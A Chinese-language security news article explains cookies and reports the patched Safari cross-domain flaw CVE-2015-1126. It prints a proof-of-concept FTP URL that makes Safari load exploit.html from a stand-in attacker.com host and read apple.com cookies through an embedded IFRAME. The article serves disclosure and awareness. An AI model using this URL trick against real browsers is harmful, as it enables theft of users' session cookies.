存在于Safari瀏覽器中的一個cookie訪問漏洞(CVE-2015-1126)可能會影響數(shù)十億蘋果產(chǎn)品，如果你在使用Safari瀏覽器，一定要盡快檢測它是否受該漏洞影響，若受影響請盡快修復(fù)。

[[132215]]

科普：cookie

Cookie，有時也用其復(fù)數(shù)形式Cookies，指某些網(wǎng)站為了辨別用戶身份、進(jìn)行session跟蹤而儲存在用戶本地終端上的數(shù)據(jù)(通常經(jīng)過加密)。Cookie可以保持登錄信息到用戶下次與服務(wù)器的會話，即下次訪問同一網(wǎng)站時，用戶不必再次輸入用戶名和密碼就可以登錄。

Cookies最典型的應(yīng)用是判定注冊用戶是否已經(jīng)登錄網(wǎng)站，用戶可能會得到提示，是否在下一次進(jìn)入此網(wǎng)站時保留用戶信息以便簡化登錄手續(xù)，這些都是Cookies的功用。另一個重要應(yīng)用場合是“購物車”之類處理，用戶可能會在一段時間內(nèi)在同一家網(wǎng)站的不同頁面中選擇不同的商品，這些信息都會寫入Cookies，以便在最后付款時提取信息。

漏洞詳情

前段時間，芬蘭一家公司Klikki Oy的安全研究員Jouko Pynnönen發(fā)現(xiàn)了Safari瀏覽器中存在安全漏洞(CVE-2015-1126)，該漏洞可能會影響數(shù)十億蘋果產(chǎn)品。該跨域漏洞會影響Safari的URL文件傳輸機(jī)制，攻擊者可以精心制作一個web網(wǎng)頁，當(dāng)受害者訪問該頁面時，就可以繞過一些正常的跨域限制，然后訪問或操作任何網(wǎng)站的HTTP cookies。

Pynnönen在一份安全報告中寫道：

研究人員解釋道，iOS 8.1、6.1.6及OS X 10.9.3和Windows8.1系統(tǒng)上的7.0.4和5.1.7版本的Safari瀏覽器都受到該漏洞的影響。

漏洞PoC URL

目前針對此漏洞，在URL中的用戶名或密碼字段編碼特殊字符就可能引發(fā)安全問題，示例鏈接如下所示。

ftp://user:password@host/path

當(dāng)用戶名或密碼字段中包含編碼的特殊字符時，通過操作該URL，攻擊者可以下載目標(biāo)網(wǎng)站的文檔資料。Pynnönen還提供了下面的示例PoC URL：

ftp://user%40attacker.com%2Fexploit.html%23@apple.com/

當(dāng)受害者訪問該URL時，存在此漏洞的Safari瀏覽器會加載攻擊者所控制網(wǎng)站attacker.com上的exploit.html文件，之后攻擊者便會利用JavaScript訪問和操作apple.com網(wǎng)站的cookies。受影響的瀏覽器會將上面URL解碼成如下形式：

ftp://user@attacker.com/exploit.html#apple.com/

即在一個正常的web頁面中嵌入指向一個FTP URL的IFRAME，這樣就可以發(fā)起攻擊了。

漏洞已修復(fù)

該漏洞已經(jīng)被蘋果公司修復(fù)，使用Safari瀏覽器的用戶可以使用Safari cookie漏洞檢測工具來檢測其瀏覽器是否受影響，若受影響一定要盡快修復(fù)它。